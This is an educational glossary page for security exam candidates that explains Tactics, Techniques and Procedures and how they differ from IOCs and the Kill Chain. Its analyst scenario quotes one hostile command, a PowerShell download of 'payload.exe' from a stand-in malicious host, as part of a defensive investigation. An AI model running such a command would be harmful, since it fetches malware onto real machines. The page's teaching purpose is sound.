Security operationsIntermediate22 min read

What Is TTP? Security Definition

Reviewed byJohnson Ajibi· Senior Network & Security Engineer · MSc IT Security

This page mentions older exam versions. See the Current Exam Context and Legacy Exam Context sections below for the updated mapping.

On This Page

Quick Definition

TTP is a way to describe how hackers operate during an attack. Tactics are the big-picture goals, techniques are the specific methods used, and procedures are the detailed steps. Understanding TTP helps security teams detect and stop attacks by recognizing patterns in attacker behavior.

Commonly Confused With

TTPvsIOC (Indicator of Compromise)

IOCs are specific pieces of evidence that a system has been compromised, such as a file hash, IP address, or registry key. TTP describes the broader behavior and methods used by the attacker. IOCs change frequently, while TTP are more enduring.

An IOC could be the MD5 hash of a malware file. The TTP would be the method the malware uses to persist, like creating a scheduled task.

TTPvsIOA (Indicator of Attack)

IOAs focus on the intent and actions of an attacker during an attack, often in real time. IOAs are about detecting the attack as it happens, while TTP is a classification system for describing the methods used. IOA is more operational, TTP is more analytical.

An IOA might be a user account making many failed login attempts in a short time. The TTP behind that could be the technique of brute force credential stuffing (T1110).

The Kill Chain is a model that describes the stages of an attack from reconnaissance to exfiltration. TTP is a way to describe the specific actions taken at each stage of the kill chain. The kill chain provides the timeline, while TTP provides the details.

The Kill Chain stage 'Weaponization' corresponds to the TTP technique of creating a malicious document. The Kill Chain stage 'Delivery' corresponds to the TTP technique of spearphishing.

Must Know for Exams

TTP is a critical concept for several major IT security exams, including CompTIA Security+, CompTIA CySA+, CompTIA CASP+, CISSP, CEH, and GIAC certifications. In CompTIA Security+ (SY0-601), TTP appears in Domain 1.2, which covers threats, vulnerabilities, and mitigations. Candidates must understand that TTP is used to describe adversary behavior in threat intelligence reports. Exam questions often ask you to identify the correct definition of TTP or to differentiate it from IOCs (Indicators of Compromise). For example, a question might describe a scenario where a security analyst receives a threat report detailing the methods used by an APT group, and you must select the term that best describes those methods.

In CompTIA CySA+ (CS0-002), TTP is central to Domain 3, which focuses on threat and vulnerability management. You may be asked to analyze a threat intelligence feed and map observed behavior to specific TTP in the MITRE ATT&CK framework. Questions may present a log entry or an alert and ask which tactic or technique is being attempted. CySA+ expects you to understand how TTP is used in threat hunting and incident response.

For CISSP, TTP appears in Domain 1 (Security and Risk Management) and Domain 7 (Security Operations). The exam tests your ability to apply TTP in risk analysis and to understand how threat intelligence feeds are used to adjust security controls. CISSP questions may be scenario-based, asking how a security manager should respond to information about a new threat group's TTP.

CEH (Certified Ethical Hacker) covers TTP in the context of understanding attacker methodologies and how to simulate them during penetration tests. The exam might ask you to match a specific TTP to a known hacking tool or technique.

In all these exams, you must remember that TTP is more durable than IOCs because TTP describes behavior patterns that persist even when attackers change their malware or IP addresses. Questions often test this difference. For example, an IOC like a file hash is easy to change, but a TTP like using DLL sideloading is a behavior that requires more effort to modify. Knowing this helps you answer questions about long-term threat intelligence.

Exam questions can also ask you to order the components of TTP, such as identifying which is the highest level (Tactics) and which is the most specific (Procedures). Being clear on these definitions is essential for multiple-choice and simulation questions.

Simple Meaning

Imagine you are a security guard at a large office building. Your job is to keep out anyone who does not belong. To do your job well, you need to understand how burglars think and act. In cybersecurity, TTP is similar. It stands for Tactics, Techniques, and Procedures. Tactics are like the overall plan a burglar might have, such as getting into the building without being seen. Techniques are the specific tools or methods they use, like picking a lock or climbing through a window. Procedures are the exact steps they follow, such as using a particular set of lockpicks in a certain order. In the digital world, security teams use TTP to track and predict what attackers will do next. For example, if a hacker uses a technique called phishing, the tactic might be to gain initial access to a network. The procedure could be sending an email that looks like it comes from the IT department. By studying TTP, defenders can set up alarms and defenses that catch these specific behaviors. This makes it harder for attackers to succeed, even if they change their tools. Think of TTP as the playbook for both attackers and defenders. Knowing the TTP of common threat groups helps security professionals respond faster and more accurately. Instead of guessing what might happen, they can prepare for known patterns. This is why TTP is a core concept in security operations, threat intelligence, and incident response.

Another way to understand TTP is to compare it to a recipe for a cake. The tactic is your goal, like baking a chocolate cake. The technique is the general method, such as using an oven instead of a microwave. The procedure is the exact list of ingredients and steps, including the brand of flour and the baking time. If someone else wanted to bake the same cake, they could follow the TTP. In cybersecurity, threat intelligence teams share TTP so that different organizations can defend against the same attack patterns. This shared knowledge makes the entire internet safer. Without TTP, each security team would have to figure out every new attack from scratch, which would be slow and inefficient.

Full Technical Definition

In cybersecurity, TTP is an acronym for Tactics, Techniques, and Procedures. This framework is used to describe the behavior of threat actors in a structured and actionable way. Tactics represent the high-level operational goals of an attacker during various stages of an attack lifecycle, such as initial access, persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement, collection, command and control, exfiltration, and impact. These tactics are often mapped to frameworks like the MITRE ATT&CK matrix, which provides a standardized taxonomy for describing adversary behavior.

Techniques are the specific methods or mechanisms used to achieve a tactical objective. For example, the tactic of initial access can be achieved through techniques such as spearphishing, exploitation of public-facing applications, or using valid accounts. Each technique has a unique identifier in the MITRE ATT&CK framework (e.g., T1566 for Phishing). Techniques are further broken down into sub-techniques that provide even more granular detail.

Procedures are the exact, step-by-step implementations of a technique. These can include specific tools, commands, scripts, or sequences of actions used by a particular threat actor group. For instance, a known APT group might use a specific variant of PowerShell to execute their commands, or they might use a custom malware sample that communicates with a specific command-and-control server. Procedures are often unique to a threat actor, making them valuable for attribution and detection.

In real IT implementations, TTP analysis is central to threat intelligence platforms, security information and event management (SIEM) systems, and endpoint detection and response (EDR) tools. Security teams use TTP to create detection rules, hunt for threats, and perform incident response. For example, if a SIEM detects a process spawning a command shell that initiates an outbound connection to an unusual IP address, that could be mapped to the technique of Command and Scripting Interpreter (T1059) under the tactic of Execution. By correlating multiple TTP indicators, analysts can build a more complete picture of an attack.

Common standards and frameworks that incorporate TTP include MITRE ATT&CK, the Diamond Model of Intrusion Analysis, and the Cyber Kill Chain. These frameworks help standardize how threat information is shared among organizations, governments, and CERTs. TTP is also essential for threat hunting, where analysts proactively search for signs of adversary behavior before an incident occurs. Understanding TTP allows defenders to shift from reactive to proactive security postures.

Real-Life Example

Think about how a car thief operates. The tactic is the overall goal, which is to steal a car without getting caught. The technique might be breaking into cars that use keyless entry systems. The procedure is the exact set of steps the thief uses, like using a specific electronic device to amplify the signal from the key fob inside the house, then opening the door, disabling the alarm, and starting the engine with a bypass tool. If you were a police officer trying to prevent car theft, you would study these TTP. You might set up cameras in parking lots where such thefts happen, or alert car owners to keep their key fobs in a metal box to block the signal.

In cybersecurity, the same idea applies. When a security team learns that a specific hacker group uses a certain type of phishing email to gain access, they can create rules to block similar emails. They know the tactic is initial access, the technique is spearphishing, and the procedure includes a specific attachment name and a link to a fake login page. By sharing this TTP across the security community, other organizations can also protect themselves.

Another everyday comparison is a pickpocket at a busy market. The tactic is to steal wallets without being noticed. The technique might be to bump into the victim while distracting them. The procedure is the exact move, like using a newspaper to hide the hand while slipping the wallet out of a back pocket. Security guards who know these TTP can watch for people holding newspapers in a certain way or making unnecessary physical contact. In cybersecurity, defenders use TTP to recognize patterns that may look innocent on their own but together reveal an attack.

Why This Term Matters

TTP matters because it moves cybersecurity from reactive defense to proactive intelligence. Instead of waiting for a virus to be discovered and then creating a signature, security teams can study how adversaries behave and build defenses that stop entire categories of attacks. For example, if you know that a certain ransomware group always uses PowerShell to disable antivirus before encrypting files, you can monitor for unusual PowerShell activity and block it before the ransomware executes. This approach is far more effective than relying solely on signature-based detection, which only catches known malware.

In practical IT contexts, TTP analysis is used daily by security operations centers (SOCs) to prioritize alerts. Analysts use TTP to determine whether a suspicious event is likely part of a known attack pattern or just a false positive. This saves time and reduces alert fatigue. TTP also helps during incident response. When an analyst investigates a breach, they document the TTP observed. This documentation helps the organization improve defenses and may be shared with law enforcement or industry groups to protect others.

For IT professionals, understanding TTP is essential for passing security certifications and for real-world job performance. It provides a common language to discuss threats, making communication between teams clearer. It also supports threat hunting, where analysts actively search for signs of adversary activity. Without TTP, cybersecurity would be chaotic, with each organization fighting isolated battles. With TTP, the community can collaborate and stay ahead of evolving threats.

TTP is foundational for compliance and risk management. Frameworks like NIST and ISO often require organizations to understand threat actors and their behaviors. By integrating TTP into risk assessments, organizations can make better decisions about where to invest in security controls. For example, if a bank knows that a common TTP for targeting financial institutions includes credential dumping, they can prioritize endpoint detection for that specific behavior.

How It Appears in Exam Questions

In IT certification exams, TTP appears in several question formats. The most common is definition-based, where the question asks: Which of the following best describes TTP in the context of threat intelligence? The answer choices typically mix TTP with similar terms like IOCs, IOAs (Indicators of Attack), or vulnerability. You must know that TTP focuses on behavior patterns, not specific technical artifacts. For example, a file hash is an IOC, while the method an attacker uses to deliver that file is a TTP.

Another common question type is scenario-based. The scenario describes an ongoing attack or a threat intelligence report. You are asked to identify which TTP component is being described. For instance, the question might say: A threat intelligence report states that a ransomware group gains initial access by sending emails with malicious macros. Which component of TTP does this describe? The correct answer is Technique. This tests your ability to distinguish between the broad goal (tactic), the method (technique), and the specific implementation (procedure).

You may also encounter matching questions where you must associate a known attack pattern with the correct MITRE ATT&CK technique ID. For example, a question might show a log entry with a suspicious PowerShell command and ask which technique is observed. Understanding common techniques like PowerShell (T1059.001) is helpful for CySA+ and CASP+.

Troubleshooting-type questions are less common but can appear. For example, a security analyst notices that an alert is generating many false positives. The question asks what should be adjusted. The answer might involve refining the detection rule to focus on specific TTP rather than broad patterns. This tests your practical understanding of how TTP improves detection accuracy.

Configuration questions can also involve TTP. For instance, a question might ask which settings in a SIEM would be most effective for detecting a specific threat group's TTP. The answer could involve enabling correlation rules for certain command-line arguments or network connections.

Finally, some exams include questions that ask about the relationship between TTP and threat hunting. You might be asked why TTP is more valuable than IOCs for long-term defense. The correct reasoning is that TTP describes behavior that is harder for attackers to change, making it more reliable for detection over time.

Practise TTP Questions

Test your understanding with exam-style practice questions.

Practise

Example Scenario

Imagine you are a security analyst at a medium-sized company. You receive an alert from your endpoint detection system. The alert says that a user's workstation executed a PowerShell command that downloaded a file from an external IP address. Your job is to determine if this is a real threat or just a routine update. You decide to use TTP to assess the situation.

First, you identify the tactic. The goal of the attacker likely is execution or command and control. Next, you identify the technique: the method is using PowerShell to download a file, which maps to MITRE ATT&CK technique T1059.001 (Command and Scripting Interpreter: PowerShell). Now you need to check the procedure. You look at the exact command: powershell -Command Invoke-WebRequest -Uri http://malicious-site.com/payload.exe -OutFile C:\temp\update.exe. This is not a normal command for an update. The user did not initiate this action.

You then correlate this with other data. You check if the external IP address is known for malicious activity. You find it is in a threat intelligence feed as a known command-and-control server. You also see that the file payload.exe has not been seen before, which is suspicious. Based on the TTP, you determine that this is likely an initial access attempt or a part of an ongoing attack. You quarantine the workstation and block the IP address on the firewall.

Later, you report the incident and document the TTP: Tactic is Execution, Technique is PowerShell, Procedure is the specific download command and the known C2 IP. This documentation helps your team create a detection rule that will catch similar TTP in the future. This scenario shows how TTP helps you move from a single alert to a structured understanding of the attack.

Common Mistakes

Believing TTP and IOCs are the same thing.

Indicators of Compromise (IOCs) are specific artifacts like file hashes or IP addresses that can change quickly. TTP describes behavior patterns that are more stable and harder for attackers to alter.

Remember that IOCs are 'what' was used, while TTP is 'how' it was used. IOCs are fast-changing, TTP are slow-changing.

Thinking TTP only applies to advanced persistent threats (APTs).

TTP is used for all types of threats, including commodity malware, ransomware, and insider threats. Even simple attacks follow some TTP pattern.

Any attack, from a basic phishing email to a complex breach, can be described using TTP. Always analyze the behavior, not just the sophistication.

Confusing tactics with techniques.

Tactics are the 'why' (the goal), while techniques are the 'how' (the method). For example, gaining access is a tactic, but phishing is a technique used to achieve that tactic.

When studying, use the MITRE ATT&CK matrix. Tactics are the columns (like Initial Access), and techniques are the rows under each column.

Ignoring procedures and only focusing on tactics and techniques.

Procedures provide the most specific and actionable intelligence for detection and response. Without procedures, you may miss unique signatures of a specific threat actor.

Always try to capture the exact commands, file names, and network connections observed. That is the procedure level of detail that makes TTP so powerful.

Assuming TTP is static and never changes.

Attackers evolve their TTP over time to evade detection. Relying on outdated TTP can lead to false negatives.

Regularly update threat intelligence feeds and review MITRE ATT&CK for new techniques. Treat TTP as living information that needs continuous refinement.

Exam Trap — Don't Get Fooled

{"trap":"The exam question provides a list of IOCs and asks which is an example of TTP. Learners often choose a file hash because it seems specific, but that is incorrect.","why_learners_choose_it":"File hashes are concrete and technical, which makes them look like they belong to TTP.

Learners may not realize that TTP is about behavior, not static artifacts.","how_to_avoid_it":"Always check if the item describes a behavior pattern or a method. If it is just a value like a hash, IP, or domain, it is an IOC.

If it describes how something was done, like using a phishing email with a specific subject line, then it is TTP."

Step-by-Step Breakdown

1

Identify the Tactic

Start by determining the high-level goal of the observed activity. For example, is the attacker trying to gain access, maintain persistence, or move laterally? This step sets the context for further analysis. In MITRE ATT&CK, tactics are the 14 columns, such as Initial Access, Execution, or Exfiltration.

2

Determine the Technique

Next, identify the specific method used to achieve the tactic. For instance, if the tactic is Initial Access, the technique might be Spearphishing Attachment (T1566.001). Techniques are more detailed than tactics and are often mapped to unique IDs in the MITRE ATT&CK framework.

3

Document the Procedure

Capture the exact steps, tools, commands, and artifacts observed. This could include the specific email subject line, the attachment name, the PowerShell script used, or the IP address of the C2 server. Procedures are unique to each attack and are critical for attribution and future detection.

4

Map to a Framework

Use established frameworks like MITRE ATT&CK to standardize the TTP. This allows you to compare your findings with known threat actor behaviors and share intelligence with other organizations. Mapping also helps prioritize responses based on known patterns.

5

Create Detection Rules

Based on the documented TTP, develop detection logic for your SIEM, EDR, or firewall. For example, if the procedure included a specific command line pattern, create a rule that flags similar patterns. This step turns TTP into proactive defense.

6

Update Threat Intelligence

Feed the new TTP back into your threat intelligence platform. This enriches your knowledge base and helps with future hunts. It also contributes to the broader security community if shared responsibly.

Practical Mini-Lesson

To fully understand TTP in practice, you need to see how it integrates with the daily life of a security analyst. Start with the concept of threat intelligence. Threat intelligence platforms, like MISP or ThreatConnect, collect and share TTP from thousands of sources. When a new threat group is discovered, analysts document their TTP. For example, the group might use a tactic of Persistence by installing a service, the technique of creating a Windows service (T1543.003), and the procedure of using the sc.exe command to install a service named 'LegitService' that runs malware. This information is then used by SOCs to create rules.

In practice, professionals use TTP for threat hunting. A threat hunter might look for unusual scheduled tasks because they know that a common TTP for ransomware is to use scheduled tasks for persistence. They write queries in a SIEM like Splunk or Azure Sentinel to find patterns matching that technique. If they find a match, they investigate further to see if the procedure matches known adversaries.

Configuration context is also important. For example, a security admin might configure Group Policy to block PowerShell execution because the TTP of many attacks involves PowerShell. However, this must be balanced with legitimate administrative needs. So, they might use AppLocker or WDAC to allow only signed PowerShell scripts, which disrupts many attack procedures.

What can go wrong? If you only focus on IOCs, you miss attackers who change their malware. But if you only focus on TTP, you might be too broad and generate many false positives. For instance, using PowerShell to download files is a common administrative task, so a rule blocking all such activity would break normal operations. That is why TTP-based detection must be tuned with context, such as user role, time of day, and other anomalous behavior.

Another practical challenge is that TTP evolves. Attackers study detection rules and change their methods. For example, if EDR tools start blocking standard PowerShell, attackers may use alternative scripting languages like Python or VBScript. Therefore, professionals must continuously update their TTP knowledge through threat feeds, research, and tabletop exercises.

For those studying for certifications, I recommend spending time on the MITRE ATT&CK website. Explore the tactics and techniques relevant to common attacks. Knowing that a technique like 'Process Injection' (T1055) is used for defense evasion will help you answer exam questions and perform better on the job. Also, practice mapping alerts to TTP. When you see a security alert, ask yourself: What is the tactic? What is the technique? What procedure is being followed? This habit will deepen your understanding far beyond memorization.

Memory Tip

Think of TTP as 'Tactics (Why), Techniques (How), Procedures (Exactly).' Remember the order from big picture to tiny detail.

Covered in These Exams

Current Exam Context

Current exam versions that test this topic — use these objectives when studying.

Legacy Exam Context

Older materials may mention these exam versions, but learners should use the current objectives for their target exam.

SY0-601SY0-701(current version)

Related Glossary Terms

Frequently Asked Questions

Is TTP only for advanced persistent threats (APTs)?

No, TTP is used for all types of cyber threats, including commodity malware, ransomware, and even insider threats. Any attack can be described using Tactics, Techniques, and Procedures.

How is TTP different from a signature-based detection?

Signature-based detection looks for specific patterns like file hashes or strings. TTP-based detection focuses on behavior patterns, making it more effective against new or modified malware that bypasses signatures.

Do I need to memorize all MITRE ATT&CK techniques for exams?

No, but you should understand the concept and be familiar with common techniques like Phishing, PowerShell, and Credential Dumping. Exams often test your ability to apply TTP concepts rather than recall every ID.

Can TTP be automated for detection?

Yes, SIEM and EDR tools use TTP-based rules for automated detection. For example, a rule can flag any process that uses a specific command-line pattern associated with a known technique.

Why do attackers change their TTP?

Attackers change TTP to avoid detection. As defenders learn their methods, attackers adapt by using new tools, scripts, or sequences. This is why continuous threat intelligence is important.

Is TTP the same as the Cyber Kill Chain?

No, they are different but complementary. The Cyber Kill Chain describes the stages of an attack (recon, delivery, exploitation, etc.), while TTP describes the specific methods used at each stage. Together, they give a complete picture.

Summary

TTP stands for Tactics, Techniques, and Procedures, and is a foundational concept in cybersecurity for describing how threat actors operate. Tactics are the high-level goals of an attack, techniques are the methods used to achieve those goals, and procedures are the detailed steps that bring the attack to life. Understanding TTP allows security professionals to move beyond simple indicator-based detection and instead focus on behavior patterns that are more resilient to change. This shift is critical for effective threat intelligence, proactive threat hunting, and incident response.

In the context of IT certifications, TTP appears in exams like CompTIA Security+, CySA+, CISSP, and CEH. You must be able to define TTP, distinguish it from IOCs and IOAs, and apply it to real-world scenarios. Knowing how to map observed behavior to the MITRE ATT&CK framework is a highly valued skill. Common mistakes include confusing TTP with IOCs, thinking TTP only applies to APTs, and neglecting the procedure level of detail.

The key takeaway for exam success is that TTP describes behavior, not artifacts. When faced with a question that asks about threat intelligence or adversary methods, think about whether the answer describes a pattern of action or a static piece of evidence. If it describes how the attacker does something, it is likely TTP. Use the memory aid 'TTP: Tactics (Why), Techniques (How), Procedures (Exactly)' to keep the levels straight. By mastering TTP, you will not only pass your exams but also become a more effective cybersecurity practitioner.